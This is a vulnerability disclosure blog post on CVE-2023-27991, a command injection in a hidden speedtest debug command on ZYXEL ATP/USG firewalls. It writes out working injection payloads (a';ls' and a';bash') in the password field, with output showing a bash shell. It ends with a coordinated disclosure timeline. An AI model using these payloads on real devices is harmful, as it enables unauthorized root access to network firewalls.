rainpwn.blog
    Back to Blog
    Remote Code Execution
    ZYXEL
    CVE-2023-27991
    ZLD 5.35

    CVE-2023-27991: Remote Code Execution in ZYXEL ATP/USG (V5.35)

    March 5, 2025
    3 min read

    "If you want to keep a secret, you must also hide it from yourself."
    – George Orwell, 1984

    Summary

    During my red teaming engagement on ZYXEL's products, I discovered several hidden commands within their ZYSH binary. One notable command is the speedtest utility, which enables testing of connectivity speed directly from the firewall.

    1. Speedtest Utility

    To run the speedtest utility, log in via SSH or the web console as either admin or
    limited-admin, and execute the following command:

    CVE-2023-27991: Remote Code Execution in ZYXEL ATP/USG (V5.35)
    Router> debug _speedtest host a user a password a interface a speedtest-host a

    This will generate the following output.

    CVE-2023-27991: Remote Code Execution in ZYXEL ATP/USG (V5.35)
    Router> debug _speedtest host a user a password a interface a speedtest-host a
+ host=a
+ id=a
+ pw=a
+ basedir=/tmp/
+ pwd
/db/etc/zyxel/ftp
+ remodir=/zyxel/x86/
+ filename=speedtest.tar.bz2
+ cd /tmp/
+ ftp -n a
ftp: a: Name or service not known
Not connected.
Not connected.
Not connected.
Not connected.
+ tar -jxvf /tmp/speedtest.tar.bz2 -C /tmp/
tar (child): /tmp/speedtest.tar.bz2: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
+ rm -f /tmp/speedtest.tar.bz2
+ cd /tmp/speedtest
+ pwd
/tmp/speedtest
+ LD_LIBRARY_PATH=/tmp/speedtest
+ ./php speedtest.php
/tmp/speedtest.sh: line 22: ./php: No such file or directory
Router>

    2. Parameter Injection

    While experimenting with the utility, I noticed that it was possible to inject parameters previously passed to the command.

    Injection Example & Directory Listing

    It appears that the username and password parameters are not sanitized properly. This allows for the injection of bash commands into the ZYSH command. An example of this injection is:

    CVE-2023-27991: Remote Code Execution in ZYXEL ATP/USG (V5.35)
    Router> debug _speedtest host a user a password a’;ls’ interface eth1 speedtest-host a

    Output:

    CVE-2023-27991: Remote Code Execution in ZYXEL ATP/USG (V5.35)
    Router> debug _speedtest host a user a password a';ls' interface a speedtest-host a 
+ host=a
+ id=a
+ pw=a
+ ls
3G_patch_file.wwan_decryption  conf             dev              firmware2       latest_version.test  script        tr069
av                             current_version  diaginfo_script  idp             licenseremind        standby_conf  twofa
cert                           debug            firmware1        latest_version  packet_trace         tmp           wtp_image
+ basedir=/tmp/
+ pwd
/db/etc/zyxel/ftp
+ remodir=/zyxel/x86/
+ filename=speedtest.tar.bz2
+ cd /tmp/
+ ftp -n a
ftp: a: Name or service not known
Not connected.
Not connected.
Not connected.
Not connected.
+ tar -jxvf /tmp/speedtest.tar.bz2 -C /tmp/
tar (child): /tmp/speedtest.tar.bz2: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
+ rm -f /tmp/speedtest.tar.bz2
+ cd /tmp/speedtest
+ pwd
/tmp/speedtest
+ LD_LIBRARY_PATH=/tmp/speedtest
+ ./php speedtest.php
/tmp/speedtest.sh: line 22: ./php: No such file or directory
Router>

    Someone in Taiwan must have thought: "Come on, who will ever find this utility? … laugh"

    3. Shell Access

    Next, I attempted to spawn a shell injecting ;bash

    Output:

    CVE-2023-27991: Remote Code Execution in ZYXEL ATP/USG (V5.35)
    Router> debug _speedtest host a user a password a';bash' interface a speedtest-host a
+ host=a
+ id=a
+ pw=a
+ bash
bash-4.2$ id
uid=10006(zyxeladmin) gid=10000(operator) groups=10000(operator)
bash-4.2$

    4. User Access Control

    To assess whether a demo user could perform the same actions, I created a new user with limited access and it works as well.

    5. Privilege Escalation

    Attempts to escalate privileges were unnecessary, as executing the command injection via the web console's CLI spawns a bash shell with root access.

    Conclusion:

    This demonstrates a serious vulnerability in the ZYXEL devices, allowing users with admin or limited-admin privileges to escalate their access to root via the web console.

    Disclosure

    • 2023-03-14: ZYXEL was notified via <security@zyxel.com.tw>
    • 2023-03-14: ZYXEL acknowledged my vulnerability report.
    • 2023-03-23: ZYXEL assigned CVE-2023-27991 to the reported issues and informed me of their intention to publish their security advisory on 2023-05-09.
    • 2023-04-14: ZYXEL informed me that they managed to fix the vulnerability ahead of schedule and would release the fix and disclose the vulnerability on 2023-04-25.
    • 2023-04-25: ZYXEL published their security advisory, following my coordinated disclosure timeline.
    Back to All Articles